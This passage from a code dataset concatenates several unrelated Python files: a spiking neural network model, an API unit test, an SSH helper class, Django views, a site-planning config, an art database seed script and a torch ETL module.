self.compute_ff_trace(self.spiking_history[:, 1:])\n fb_trace = self.compute_fb_trace(self.spiking_history[:, 1:])[self.learnable_neurons, :]\n\n self.potential = self.compute_ff_potential(ff_trace) + self.compute_fb_potential(fb_trace) + self.bias\n\n ### Update spiking history\n self.spiking_history = self.update_spiking_history(input_signal)\n\n ### Compute log-probabilities\n # noinspection PyTypeChecker\n log_proba = self.spiking_history[self.learnable_neurons, -1] * torch.log(1e-07 + torch.sigmoid(self.potential)) \\\n + (1 - self.spiking_history[self.learnable_neurons, -1]) * torch.log(1. + 1e-07 - torch.sigmoid(self.potential)) # We add 1e-07 for numerical stability of the log\n\n assert log_proba.shape == torch.Size([self.n_learnable_neurons]), \\\n 'Wrong log_probability shape, got: ' + str(log_proba.shape) + ', expected: ' + str(torch.Size([self.n_learnable_neurons]))\n\n\n ### Compute gradients\n if self.training:\n self.compute_gradients(self.spiking_history[self.learnable_neurons, -1], self.potential, ff_trace, fb_trace)\n\n return log_proba\n\n\n\n ### Weights initialization\n def initialize_ff_weights(self, topology, howto='glorot', gain=0.):\n if howto == 'glorot':\n std = torch.tensor([torch.sqrt(torch.tensor(2.)) / ((torch.sum(topology[:, i]) + torch.sum(topology[i, :])) * self.n_basis_feedforward) for i in range(self.n_learnable_neurons)]).flatten()\n std = std.unsqueeze(1).unsqueeze(2).repeat(1, self.n_neurons, self.n_basis_feedforward)\n assert std.shape == self.ff_weights_shape\n self.feedforward_weights = (torch.normal(gain * std, std).to(self.device) * self.feedforward_mask)\n elif howto == 'uniform':\n self.feedforward_weights = (gain * (torch.rand(self.ff_weights_shape) * 2 - 1).to(self.device) * self.feedforward_mask)\n\n self.ff_grad = torch.zeros(self.ff_weights_shape).to(self.device)\n\n def initialize_fb_weights(self, topology, howto='glorot', gain=0.):\n if howto == 'glorot':\n std = torch.tensor([torch.sqrt(torch.tensor(2.) / (torch.sum(topology[:, i]) + torch.sum(topology[i, :]))) for i in range(self.n_learnable_neurons)]).flatten()\n std = std.unsqueeze(1).repeat(1, self.n_basis_feedback)\n assert std.shape == self.fb_weights_shape\n self.feedback_weights = (torch.normal(gain * std, std)).to(self.device)\n elif howto == 'uniform':\n self.feedback_weights = (gain * (torch.rand(self.fb_weights_shape) * 2 - 1)).to(self.device)\n\n self.fb_grad = torch.zeros(self.fb_weights_shape).to(self.device)\n\n def initialize_bias_weights(self, topology, howto='glorot', gain=0.):\n if howto == 'glorot':\n std = torch.tensor([torch.sqrt(torch.tensor(2.)) / (torch.sum(topology[:, i]) + torch.sum(topology[i, :])) for i in range(self.n_learnable_neurons)]).flatten()\n assert std.shape == self.bias_shape\n self.bias = (torch.normal(gain * std, std)).to(self.device)\n elif howto == 'uniform':\n self.bias = (gain * (torch.rand(self.bias_shape) * 2 - 1)).to(self.device)\n\n self.bias_grad = torch.zeros(self.bias_shape).to(self.device)\n\n\n\n ### Computations\n def compute_ff_trace(self, spikes):\n return torch.matmul(spikes.flip(-1), self.feedforward_filter[:spikes.shape[-1]])\n\n\n def compute_fb_trace(self, spikes):\n return torch.matmul(spikes.flip(-1), self.feedback_filter[:spikes.shape[-1]])\n\n\n def compute_ff_potential(self, ff_trace):\n return torch.sum(self.feedforward_weights * ff_trace * self.feedforward_mask, dim=(-1, -2))\n\n\n def compute_fb_potential(self, fb_trace):\n return torch.sum(self.feedback_weights * fb_trace, dim=(-1))\n\n\n def generate_spikes(self, spiking_history, neurons_group):\n spiking_history[neurons_group, -1] = torch.bernoulli(torch.sigmoid(self.potential[neurons_group - self.n_input_neurons])).to(self.device)\n\n if torch.isnan(spiking_history).any():\n print('Spiking history')\n print(self.spiking_history[neurons_group, -1])\n print('Inputs')\n print(self.spiking_history[self.input_neurons, -5:])\n print('Potential')\n print(self.potential[neurons_group - self.n_input_neurons])\n\n raise RuntimeError\n\n return spiking_history\n\n def update_spiking_history(self, input_signal):\n spiking_history = torch.cat((self.spiking_history[:, - self.memory_length:], torch.zeros([self.n_neurons, 1]).to(self.device)), dim=-1)\n spiking_history[self.visible_neurons, -1] = input_signal\n\n if self.n_hidden_neurons > 0:\n spiking_history = self.generate_spikes(spiking_history, self.hidden_neurons)\n if not self.training:\n spiking_history = self.generate_spikes(spiking_history, self.output_neurons)\n\n return spiking_history\n\n\n def compute_gradients(self, spikes, potential, feedforward_trace, feedback_trace):\n self.bias_grad = spikes - torch.sigmoid(potential)\n assert self.bias_grad.shape == self.bias.shape, \"Wrong bias gradient shape\"\n\n self.ff_grad = feedforward_trace.unsqueeze(0).repeat(self.n_learnable_neurons, 1, 1) \\\n * self.bias_grad.unsqueeze(1).repeat(1, self.n_neurons).unsqueeze(2).repeat(1, 1, self.n_basis_feedforward) \\\n * self.feedforward_mask\n assert self.ff_grad.shape == self.ff_weights_shape, \"Wrong feedforward weights gradient shape\"\n\n self.fb_grad = feedback_trace * self.bias_grad.unsqueeze(1).repeat(1, self.n_basis_feedback)\n assert self.fb_grad.shape == self.fb_weights_shape, \"Wrong feedback weights gradient shape\"\n","sub_path":"snn/models/SNN.py","file_name":"SNN.py","file_ext":"py","file_size_in_byte":8666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"496124065","text":"# -*- coding: utf-8 -*-\n#\n# Copyright (C) 2010-2015 YVertical.\n# Ding Guijin, guijin.ding@yvertical.com\n#\n\nfrom ppmessage.core.constant import OS\n\nfrom ppmessage.core.constant import CONVERSATION_TYPE\nfrom ppmessage.core.constant import PPMESSAGE_APP\n\nfrom ppmessage.core.utils.getipaddress import getIPAddress\nfrom ppmessage.db.models import DeviceUser\n\nimport tornado.httpclient\nimport uuid\nimport unittest\nimport traceback\nimport json\nimport uuid\nimport redis\nimport hashlib\n\nclass TestPageUnackedMessageCase(unittest.TestCase):\n def setUp(self):\n self._redis = redis.Redis(db=1)\n return\n\n def tearDown(self):\n pass\n\n def _get_return(self, _name):\n if self._return_data == None:\n return None\n return self._return_data.get(_name)\n \n def _prepare_login_signature(self, _uuid, _pass):\n _pass = hashlib.sha1(_pass).hexdigest()\n _sig = hashlib.sha1(_uuid + _pass).hexdigest();\n return _sig\n\n def _prepare_login_user_uuid(self, _email):\n _key = DeviceUser.__tablename__ + \".user_email.\" + _email\n _uuid = self._redis.get(_key)\n return _uuid\n \n def _prepare(self, _cmd):\n _request_uuid = str(uuid.uuid1())\n _secret = PPMESSAGE_APP[\"secret\"] + _request_uuid\n _request_signature = hashlib.sha1(_secret).hexdigest()\n\n _headers = {}\n _headers[\"Content-Type\"] = \"application/json\"\n _headers[\"X-If-IMAPP\"] = \"true\"\n _headers[\"X-App-Key\"] = PPMESSAGE_APP[\"key\"]\n _headers[\"X-Request-UUID\"] = _request_uuid\n _headers[\"X-Request-Signature\"] = _request_signature\n\n self._headers = _headers\n \n _http = \"https://\"\n _host = \"ppmessage.cn\"\n _port = 80\n if DEV_MODE:\n _host = getIPAddress()\n _http = \"http://\"\n _port = 8080\n\n self._url = _http + _host + \":\" + str(_port) + \"/api/\" + _cmd\n return\n \n def _exec(self, _data):\n http_client = tornado.httpclient.HTTPClient()\n try:\n response = http_client.fetch(self._url,\n method=\"POST\",\n headers=self._headers,\n body=json.dumps(_data))\n #print(response.body)\n _r = json.loads(response.body)\n self._return_data = None\n if _r[\"error_code\"] == 0:\n self._return_data = _r\n\n if _r[\"error_code\"] != 0:\n print(_r)\n \n self.assertEqual(_r[\"error_code\"], 0)\n \n except tornado.httpclient.HTTPError as e:\n self.assertEqual(1, 0)\n finally:\n http_client.close()\n \n return\n \n def test_pp_page_user_conversation(self):\n _app_uuid = \"1e47652b-8907-11e5-a8af-58b035f16bf4\"\n _user_uuid = \"526d2898-9a26-11e5-b287-00163e00061e\"\n _device_uuid = \"d2a7f6e0-abca-11e5-b287-00163e00061e\"\n\n _api = \"PP_PAGE_UNACKED_MESSAGE\"\n _data = {\"app_uuid\": _app_uuid, \"user_uuid\": _user_uuid, \"device_uuid\": _device_uuid}\n self._prepare(_api)\n self._exec(_data)\n return\n\nif __name__ == \"__main__\":\n unittest.main()\n\n","sub_path":"ppmessage/unittest/api/testPageUnackedMessage.py","file_name":"testPageUnackedMessage.py","file_ext":"py","file_size_in_byte":3290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"395512514","text":"# Copyright 2013: Mirantis Inc.\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport eventlet\nimport os\nimport paramiko\nimport random\nimport select\nimport socket\nimport string\nimport time\n\nfrom rally import exceptions\nfrom rally.openstack.common.gettextutils import _ # noqa\nfrom rally.openstack.common import log as logging\n\nLOG = logging.getLogger(__name__)\n\n\nclass SSH(object):\n \"\"\"SSH common functions.\"\"\"\n\n def __init__(self, ip, user, port=22, key=None, timeout=1800):\n \"\"\"Initialize SSH client with ip, username and the default values.\n\n timeout - the timeout for execution of the command\n \"\"\"\n self.ip = ip\n self.user = user\n self.timeout = timeout\n self.client = None\n if key:\n self.key = key\n else:\n self.key = os.path.expanduser('~/.ssh/id_rsa')\n\n def _get_ssh_connection(self):\n self.client = paramiko.SSHClient()\n self.client.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n self.client.connect(self.ip, username=self.user, key_filename=self.key)\n\n def _is_timed_out(self, start_time):\n return (time.time() - self.timeout) > start_time\n\n def execute(self, *cmd):\n \"\"\"Execute the specified command on the server.\"\"\"\n self._get_ssh_connection()\n cmd = ' '.join(cmd)\n transport = self.client.get_transport()\n channel = transport.open_session()\n channel.fileno()\n channel.exec_command(cmd)\n channel.shutdown_write()\n poll = select.poll()\n poll.register(channel, select.POLLIN)\n start_time = time.time()\n while True:\n ready = poll.poll(16)\n if not any(ready):\n if not self._is_timed_out(start_time):\n continue\n raise exceptions.TimeoutException('SSH Timeout')\n if not ready[0]:\n continue\n out_chunk = err_chunk = None\n if channel.recv_ready():\n out_chunk = channel.recv(4096)\n LOG.debug(out_chunk)\n if channel.recv_stderr_ready():\n err_chunk = channel.recv_stderr(4096)\n LOG.debug(err_chunk)\n if channel.closed and not err_chunk and not out_chunk:\n break\n exit_status = channel.recv_exit_status()\n if 0 != exit_status:\n raise exceptions.SSHError(\n 'SSHExecCommandFailed with exit_status %s'\n % exit_status)\n self.client.close()\n\n def upload(self, source, destination):\n \"\"\"Upload the specified file to the server.\"\"\"\n if destination.startswith('~'):\n destination = '/home/' + self.user + destination[1:]\n self._get_ssh_connection()\n ftp = self.client.open_sftp()\n ftp.put(os.path.expanduser(source), destination)\n ftp.close()\n\n def execute_script(self, script, enterpreter='/bin/sh'):\n \"\"\"Execute the specified local script on the remote server.\"\"\"\n destination = '/tmp/' + ''.join(\n random.choice(string.lowercase) for i in range(16))\n\n self.upload(script, destination)\n self.execute('%s %s' % (enterpreter, destination))\n self.execute('rm %s' % destination)\n\n def wait(self, timeout=120, interval=1):\n \"\"\"Wait for the host will be available via ssh.\"\"\"\n with eventlet.timeout.Timeout(timeout, exceptions.TimeoutException):\n while True:\n try:\n return self.execute('uname')\n except (socket.error, exceptions.SSHError) as e:\n LOG.debug(\n _('Ssh is still unavailable. (Exception was: %r)') % e)\n eventlet.sleep(interval)\n","sub_path":"rally/sshutils.py","file_name":"sshutils.py","file_ext":"py","file_size_in_byte":4319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"533227596","text":"from django.shortcuts import render, get_object_or_404\nfrom django.http import HttpResponse\n# Create your views here.\n\nfrom .models import product\n\ndef product_list(request):\n queryset = product.objects.all()\n context = {\n \"object_list\": queryset,\n \"title\": \"List\"\n\n }\n template = 'product_list.html'\n return render(request, template, context)\n\ndef product_detail(request, id=None):\n #instance = product.objects.get(id=1)\n instance = get_object_or_404(product, id=id)\n context = {\n \"title\": instance.author,\n \"instance\": instance,\n }\n return render(request, \"product_detail.html\", context)\n\n","sub_path":"src/product/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"27558602","text":"import os\n# note or checking\n# ------------------------------------------------------------------------------------\n# Root Folders\n# ------------------------------------------------------------------------------------\nroot_directory = os.path.dirname(__file__)\nroot_participation_directory = os.path.join(root_directory, 'data')\n\n\n# ------------------------------------------------------------------------------------\n# Folder references\n# ------------------------------------------------------------------------------------\nreference_directory=os.path.join(root_directory,'static/reference_directory')\nreference_directory_images=os.path.join(root_directory,'static/recommendation_output')\ninterface_images=os.path.join(root_directory,'static/images')\nmodel_directory=os.path.join(root_directory,'style_transfer_models')\noverall_results_directory = os.path.join(root_directory,'overall_results')\n\n\n# ------------------------------------------------------------------------------------\n# Files references\n# ------------------------------------------------------------------------------------\nlink_base_image = os.path.join(interface_images, 'base_image.jpg')\nlink_base_image_png = os.path.join(interface_images, 'base_image_png.png')\nlink_base_image_warning = os.path.join(interface_images, 'base_image_warning.jpg')\nlink_base_image_large = os.path.join(interface_images, 'base_image_large.jpg')\nlink_base_image_large_annotated = os.path.join(interface_images, 'base_image_large_annotated.jpg')\nlink_styles_catalogue = os.path.join(interface_images, 'overall_style.jpg')\nlink_outcome_success = os.path.join(interface_images, 'outcome_success.jpg')\nlink_outcome_failure = os.path.join(interface_images, 'outcome_failure.jpg')\nlink_feedback_massing_base = os.path.join(interface_images, 'feedback_massing_base.jpg')\nclick_on_screen = os.path.join(interface_images, 'cick_on_screen.jpg')\nucl_east_image = os.path.join(interface_images, 'ucl_east_marshgate.jpg')\ndatabse_filepath = os.path.join (overall_results_directory,'database.json')\nfeedback_barrier_base = os.path.join(interface_images, 'feedback_barrier_base.jpg')\nfeedback_canal_base = os.path.join(interface_images, 'feedback_canal_base.jpg')\nfeedback_noise_base = os.path.join(interface_images, 'feedback_noise_base.jpg')\nfeedback_barrier = os.path.join(interface_images, 'feedback_barrier.jpg')\nfeedback_canal = os.path.join(interface_images, 'feedback_canal.jpg')\nfeedback_noise = os.path.join(interface_images, 'feedback_noise.jpg')\ndraw_no_lines_drawn = os.path.join(interface_images, 'draw_no_lines_drawn.jpg')\nbase_canal_calculation = os.path.join(interface_images, 'base_canal_calculation.jpg')\nbase_noise_calculation = os.path.join(interface_images, 'base_noise_calculation.jpg')\n\n# ------------------------------------------------------------------------------------\n# Generic data on image size and typical colours\n# ------------------------------------------------------------------------------------\nwebsite_colour = (29, 41, 82)\nthreshold_distance=20 # threshold for snapping lines into origin points\nn_neighbours=2 # neighborxs for style recommendation\n\n# size of canvas\nshape_x=700\nshape_y=700\n\n# line colors\ncolor_lines= (0,0,0)\ncolor_lines_cv2= (0,0,0)\n\n\n# ------------------------------------------------------------------------------------\n# Color and line thickness definition. Coordinate with drawscapes_scripts.js\n# ------------------------------------------------------------------------------------\n# Use color coder in https://www.google.com/search?q=color+picker\n# height in storeys of building massing accordign to layers\n# heigth is measured from the ground, ie, it is NOT stacked in the calculation\n# thickness of linmes measured in pixels. To get actual width multiply * site_scale_factor\ncolor_canvas_rgb = [[0,0,0],[230, 196, 138],[255, 110, 94],[255, 0, 0],[186, 163, 13], [112, 48, 160],[204, 102, 24], [44, 112, 15]]\nthickness_lines = [5,30,22,15, 10, 10, 10, 10]\nmassing_height = [0,2,5,10, 0, 0, 0, 10] # last two colours do will appear in massing clal but the function will loop over all colors incl land uses\n\n\n# ------------------------------------------------------------------------------------\n# Definition of exercises carried out during the uinterface use and how they are saved in database\n# ------------------------------------------------------------------------------------\nexercises = ['lines','massing','land_uses']\n\t\n\n# ------------------------------------------------------------------------------------\n# Site specific geometric data\n# ------------------------------------------------------------------------------------\nnode_coords=[[146,227],\n[201,212],\n[393,160],\n[454,144],\n[469,186],\n[535,307],\n[584,371],\n[410,547],\n[344,567]]\n\nnode_coords_bridge=[[469,186], [535,307], [344,567]] # these are nodes that lead to connections under the DLR bridge\n\n#detailed shape of polygon to draw montage. May incluide more points than coords\nnode_coords_detailed=[[146,227],\n[201,212],\n[393,160],\n[454,144],\n[469,186],\n[535,307],\n[584,371],\n[410,547],\n[344,567],\n[226,438],\n[146,273]]\n\n# Factor that relates pixel size to meters = diagonal_meters / diagonal_pixels\nsite_scale_factor = 250/461\n\n# data on UCL EAST development\nucl_east_development_area = 134700\nucl_east_student_population = 500\nucl_east_research_area = 5000\n\n# data for conversion of massign m2 to land uses\nratio_accomodation_base = 0\nratio_accomodation_plinth = 0.3\nratio_accomodation_tower = 0.7\nm2accomodation_per_student = 15\nratio_research_base = 0.5\nratio_research_plinth = 0.3\nratio_research_tower = 0","sub_path":"project_data.py","file_name":"project_data.py","file_ext":"py","file_size_in_byte":5578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"371986128","text":"from sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom formific_models import Base, User, Medium, ArtItem\n\nengine = create_engine('postgresql://formific:formific@localhost/formific')\nBase.metadata.drop_all(engine)\nBase.metadata.create_all(engine)\n\nDBSession = sessionmaker(bind=engine)\nsession = DBSession()\n\n# Create the first user\nuser1 = User(name='Yshia Wallace', email='yshiawallace@gmail.com')\nsession.add(user1)\nsession.commit()\n\n# Create media categories\nmedium1 = Medium(name='Painting')\nsession.add(medium1)\nsession.commit()\n\nmedium2 = Medium(name='Drawing')\nsession.add(medium2)\nsession.commit()\n\nmedium3 = Medium(name='Sculpture')\nsession.add(medium3)\nsession.commit()\n\nmedium4 = Medium(name='Video')\nsession.add(medium4)\nsession.commit()\n\nmedium5 = Medium(name='Photography')\nsession.add(medium5)\nsession.commit()\n\nmedium6 = Medium(name='Ceramics')\nsession.add(medium6)\nsession.commit()\n\nmedium7 = Medium(name='Installation')\nsession.add(medium7)\nsession.commit()\n\n# Create art items\nitem1 = ArtItem(\n name='Rachel',\n description='A scene from the story of Rachel by MH Tse.',\n material='Gouache on Arches',\n image_url='http://www.yshiawallace.com/files/gimgs/33_gouacherachel.jpg', # noqa\n video_url=\"\",\n year='2013',\n medium=medium1,\n user_id=1\n )\nsession.add(item1)\nsession.commit()\n\nitem2 = ArtItem(\n name='Homecoming',\n description='Another scene from the story of Rachel by MH Tse.',\n material='Gouache on Arches',\n image_url='http://www.yshiawallace.com/files/gimgs/33_gouachehomecoming.jpg', # noqa\n video_url=\"\",\n year='2013',\n medium=medium1,\n user_id=1\n )\nsession.add(item2)\nsession.commit()\n\nitem3 = ArtItem(\n name='Cairns',\n description=(\n 'This is part of a series of drawings called \"Cairns\".'\n 'As adults we become inured to the passage of time.'\n 'Each day blends into the next without definition.'\n 'By documenting a scene from each day,'\n 'I attempted to give the day definition,'\n 'and in this way expand or slow my perception of time passing.'\n 'Each scene is an anchor in time.'\n ),\n material='India ink on dot matrix paper',\n image_url='http://www.yshiawallace.com/files/gimgs/36_cairns-03.jpg',\n video_url=\"\",\n year='2013',\n medium=medium2,\n user_id=1\n )\nsession.add(item3)\nsession.commit()\n\nitem4 = ArtItem(\n name='Cairns',\n description=(\n 'This is part of a series of drawings called \"Cairns\".'\n 'As adults we become inured to the passage of time.'\n 'Each day blends into the next without definition.'\n 'By documenting a scene from each day, I attempted to give'\n 'the day definition, and in this way expand or slow my'\n 'perception of time passing. Each scene is an anchor in time.'\n ),\n material='India ink on dot matrix paper',\n image_url='http://www.yshiawallace.com/files/gimgs/36_cairns-04.jpg',\n video_url=\"\",\n year='2013',\n medium=medium2,\n user_id=1\n )\nsession.add(item4)\nsession.commit()\n\nitem5 = ArtItem(\n name='Jane Doe',\n description='A weapon for women walking alone at night.',\n material='Bronze',\n image_url='http://www.yshiawallace.com/files/gimgs/14_janedoe.jpg',\n video_url=\"\",\n year='2009',\n medium=medium3,\n user_id=1\n )\nsession.add(item5)\nsession.commit()\n\nitem6 = ArtItem(\n name='Jane Doe',\n description=(\n 'A bronze sculpture of a mole rat. It is 8 x 2 inches'\n 'and has an opaque white patina. A wax cast of wrinkled'\n 'cling film was used to create the skin texture of the rat.'\n ),\n material='Bronze',\n image_url='http://www.yshiawallace.com/files/gimgs/11_molerats6.jpg',\n video_url=\"\",\n year='2009',\n medium=medium3,\n user_id=1\n )\nsession.add(item6)\nsession.commit()\n\nitem7 = ArtItem(\n name='Trees',\n description=(\n 'A video based on a short poem about one person'\n 're-experiencing bits of consciousness as they'\n 'fade then flow away. Narrated by Penelope Michaelides,'\n 'written by Man Ha Tse,'\n 'directed by Yshia Wallace & Man Ha Tse,'\n 'edited by Yshia Wallace.'\n ),\n material='Animation',\n image_url='http://yshiawallace.com/images/trees-thumbnail-1.png',\n video_url=\"https://vimeo.com/user18914778/trees\",\n year='2014',\n medium=medium4,\n user_id=1\n )\nsession.add(item7)\nsession.commit()\n\nitem8 = ArtItem(\n name='Live Feed',\n description=(\n 'This is the first animated movie I made using After Effects.'\n 'I scanned one of my drawings and torn japanese paper'\n 'and manipulated them as layers in AE. Music is by'\n 'Michael Nyman - a track called \"Wheelbarrow Walk.\"'\n ),\n material='Animation',\n image_url='http://yshiawallace.com/images/live-feed-thumbnail.png',\n video_url=\"https://vimeo.com/5039152\",\n year='2010',\n medium=medium4,\n user_id=1\n )\nsession.add(item8)\nsession.commit()\n","sub_path":"formificApp/formificApp/starter_items.py","file_name":"starter_items.py","file_ext":"py","file_size_in_byte":5505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"44452500","text":"# standardlib\nimport csv\nimport re\nfrom pathlib import Path\nfrom typing import List, Tuple, Callable\n\n# external package\nimport numpy as np\nfrom sklearn.model_selection import StratifiedShuffleSplit\nimport pandas as pd\nimport cv2\nimport torch\nfrom torchvision import transforms, datasets\nfrom torch.utils.data import Dataset\n\n# user\nfrom etl.base.dataset import BaseDataset\n\nclass Extract(BaseDataset):\n\tdef __init__(self, parent_directory: str, \n\t\t\t\t extension: str,\n\t\t\t\t labels: List[str], \n\t\t\t\t training_size: float, \n\t\t\t\t random_state: int, \n\t\t\t\t verbose: bool) -> None:\n\t\t\"\"\"Class for creating csv files of train, validation, and test\n\n\t\tParameters\n\t\t----------\n\t\tparent_directory\n\t\t\tThe parent_directory folder path. It is highly recommended to use Pathlib\n\t\textension\n\t\t\tThe extension we want to include in our search from the parent_directory directory\n\t\tlabels\n\n\t\tReturns\n\t\t-------\n\t\tNone\t\n\t\t\"\"\"\n\t\tsuper().__init__(parent_directory, extension)\n\t\tself.labels = labels\n\t\tself.training_size = training_size\n\t\tself.test_size = 1 - training_size\n\t\tself.random_state = random_state\n\t\tself.verbose = verbose\n\n\tdef _create_dataset_array(self) -> Tuple[np.ndarray, np.ndarray]:\n\t\t\"\"\"Sklearn stratified sampling uses a whole array so we must build it first\n\n\t\tParameters\n\t\t----------\n\t\tNone\n\n\t\tReturns\n\t\t-------\n\t\tTuple of X and y\t\n\t\t\"\"\"\n\t\ttarget = []\n\t\tname = []\n\t\t\n\t\tfor parent_directory in self.read_files():\n\t\t\tchild = parent_directory.parts[len(self.parent_directory.parts):]\n\t\t\tchild = '/'.join(str(part) for part in child)\n\t\t\tfor encoded_label, label in enumerate(self.labels):\n\t\t\t\tif re.search(label, child):\n\t\t\t\t\tname.append(str(child))\n\t\t\t\t\ttarget.append(encoded_label)\n\t\tif self.verbose:\n\t\t\tprint(\"Finished creating whole dataset array\")\n\n\t\treturn np.array(name), np.array(target)\n\n\tdef _stratify_sampling(self) -> Tuple[np.ndarray, np.ndarray, np.ndarray]:\n\t\t\"\"\"Sklearn stratified sampling uses a whole array so we must build it first\n\n\t\tParameters\n\t\t----------\n\t\tNone\n\n\t\tReturns\n\t\t-------\n\t\tTuple of train(X, y), validation(X, y), and test(X, y)\t\n\t\t\"\"\"\n\t\tx, y = self._create_dataset_array()\n\t\tsss = StratifiedShuffleSplit(n_splits=1, train_size=self.training_size, test_size=self.test_size, random_state=self.random_state)\n\n\t\tfor train_index, validation_test_index in sss.split(x, y):\n\t\t\tx_train, x_validation_test = x[train_index], x[validation_test_index]\n\t\t\ty_train, y_validation_test = y[train_index], y[validation_test_index]\n\n\t\tsss = StratifiedShuffleSplit(n_splits=1, train_size=0.5, test_size=0.5,random_state=self.random_state)\n\t\tfor validation_index, test_index in sss.split(x_validation_test, y_validation_test):\n\t\t\tx_validation, x_test = x_validation_test[validation_index], x_validation_test[test_index]\n\t\t\ty_validation, y_test = y_validation_test[validation_index], y_validation_test[test_index]\n\n\t\ttrain = np.c_[x_train, y_train]\n\t\tvalidation = np.c_[x_validation, y_validation]\n\t\ttest = np.c_[x_test, y_test]\n\n\t\tif self.verbose:\n\t\t\tprint(\"Finished splitting dataset into train, validation, and test\")\n\t\treturn train, validation, test\n\n\tdef extract(self, filename: str, save_path: str):\n\t\t\"\"\"Create csv file of train, validation, and test\n\n\t\tParameters\n\t\t----------\n\t\tfilename\n\t\t\tThe prefix of train, validation, and test filename\n\t\t\tHave the format of filename_train.csv, filename_validation.csv, and test_validation.csv\n\t\tsave_path\n\t\t\tThe parent_directory folder name of filename_train.csv, filename_validation.csv, and test_validation.csv\n\n\t\tReturns\n\t\t-------\n\t\ttrain, validation, and test csv with the following name:\n\t\tfilename_train.csv, filename_validation.csv, and test_validation.csv\t\n\t\t\"\"\"\n\t\ttrain, validation, test = self._stratify_sampling()\n\n\t\tsave_into = Path.cwd() / save_path\n\t\tsave_into.mkdir(parents=True, exist_ok=True)\n\n\t\twith open(f'{save_path}/{filename}_train.csv', 'w') as writer:\n\t\t\tcsv_writer = csv.writer(writer)\n\t\t\tfor row in train:\n\t\t\t\tcsv_writer.writerow(row)\n\n\t\tif self.verbose:\n\t\t\tprint(f'Finished writing {filename}_train.csv into {save_into}')\n\t\t\n\n\t\twith open(f'{save_path}/{filename}_validation.csv', 'w') as writer:\n\t\t\tcsv_writer = csv.writer(writer)\n\t\t\tfor row in validation:\n\t\t\t\tcsv_writer.writerow(row)\n\n\t\tif self.verbose:\n\t\t\tprint(f'Finished writing {filename}_validation.csv into {save_into}')\n\n\t\twith open(f'{save_path}/{filename}_test.csv', 'w') as writer:\n\t\t\tcsv_writer = csv.writer(writer)\n\t\t\tfor row in test:\n\t\t\t\tcsv_writer.writerow(row)\n\n\t\tif self.verbose:\n\t\t\tprint(f'Finished writing {filename}_test.csv into {save_into}')\n\nclass TransformAndLoad(Dataset):\n\tdef __init__(self, parent_directory: str, \n\t\t\t\t extension: str, \n\t\t\t\t csv_file: str, \n\t\t\t\t transform: Callable = None) -> None:\n\t\t\"\"\"Class for reading csv files of train, validation, and test\n\n\t\tParameters\n\t\t----------\n\t\tparent_directory\n\t\t\tThe parent_directory folder path. It is highly recommended to use Pathlib\n\t\textension\n\t\t\tThe extension we want to include in our search from the parent_directory directory\n\t\tcsv_file\n\t\t\tThe path to csv file containing X and y\n\t\tTransform\n\t\t\tCallable which apply transformations\n\n\t\tReturns\n\t\t-------\n\t\tNone\t\n\t\t\"\"\"\n\t\tself.parent_directory = parent_directory\n\t\tself.extension = extension\n\t\tself.csv_file = pd.read_csv(csv_file)\n\t\tself.transform = transform\n\t\n\tdef __len__(self) -> int:\n\t\t\"\"\"Return the length of the dataset\n\n\t\tParameters\n\t\t----------\n\t\tparent_directory\n\t\t\tThe parent_directory folder path. It is highly recommended to use Pathlib\n\t\textension\n\t\t\tThe extension we want to include in our search from the parent_directory directory\n\t\tcsv_file\n\t\t\tThe path to csv file containing X and y\n\t\tTransform\n\t\t\tCallable which apply transformations\n\n\t\tReturns\n\t\t-------\n\t\tLength of the dataset\t\n\t\t\"\"\"\n\t\treturn len(self.csv_file)\n\n\tdef __getitem__(self, idx: int) -> Tuple[np.ndarray, np.ndarray]:\n\t\t\"\"\"Return the X and y of a specific instance based on the index\n\n\t\tParameters\n\t\t----------\n\t\tidx\n\t\t\tThe index of the instance \n\n\t\tReturns\n\t\t-------\n\t\tTuple of X and y of a specific instance\t\n\t\t\"\"\"\n\t\tparent_directory = self.parent_directory / self.csv_file.iloc[idx, 0]\n\t\ttarget = self.csv_file.iloc[idx, 1]\n\t\tparent_directory = cv2.imread(str(parent_directory))\n\n\t\tif self.transform:\n\t\t\tparent_directory = self.transform(parent_directory)\n\n\t\treturn parent_directory, target\n\n\ndef main():\n\n\t# create training, validation, and test csv\n\tparent_directory = Path.cwd() / 'data' \n\ta = Extract(parent_directory, \"jpg\", [\"attack\", \"real\"], 0.8, 69, verbose=True)\n\ta.extract(filename=\"mfsd\", save_path=\"data/mfsd\")\n\n\t# check individual dataset\n\tmfsd_train_csv = str(parent_directory / \"mfsd\" / \"mfsd_train.csv\")\n\n\tdata_transform = transforms.Compose([\n\ttransforms.ToPILImage(),\n\ttransforms.RandomResizedCrop(224),\n\ttransforms.RandomHorizontalFlip(),\n\ttransforms.ToTensor(),\n\ttransforms.Normalize(\n\t\t\t\t\t\tmean=[0.485, 0.456, 0.406],\n\t\t\t\t\t\tstd=[0.229, 0.224, 0.225])\n\t])\n\n\tc = TransformAndLoad(parent_directory=parent_directory, extension=\"jpg\", csv_file=mfsd_train_csv, transform=data_transform)\n\tprint(c.__getitem__(0))\n\n\nif __name__ == \"__main__\":\n\tmain()","sub_path":"torchetl/.ipynb_checkpoints/etl-checkpoint.py","file_name":"etl-checkpoint.py","file_ext":"py","file_size_in_byte":7019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"495956948","text":"#!/usr/bin/env python3\n# -*- coding: 